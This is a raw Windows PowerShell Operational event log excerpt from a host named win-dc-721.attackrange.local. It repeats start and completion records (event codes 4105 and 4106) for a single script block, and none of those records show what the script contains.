Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474347
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474346
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474345
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474344
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474343
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474342
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474341
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474340
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474339
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474338
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474337
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474336
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474335
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474334
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474333
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474332
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474331
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474330
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474329
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474328
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474327
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474326
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474325
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474324
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474323
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474322
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474321
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474320
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474319
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474318
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474317
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474316
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474315
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474314
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474313
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474312
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474311
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474310
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474309
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474308
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474307
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474306
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474305
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474304
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474303
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474302
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474301
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474300
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474299
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474298
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474297
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474296
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474295
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474294
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
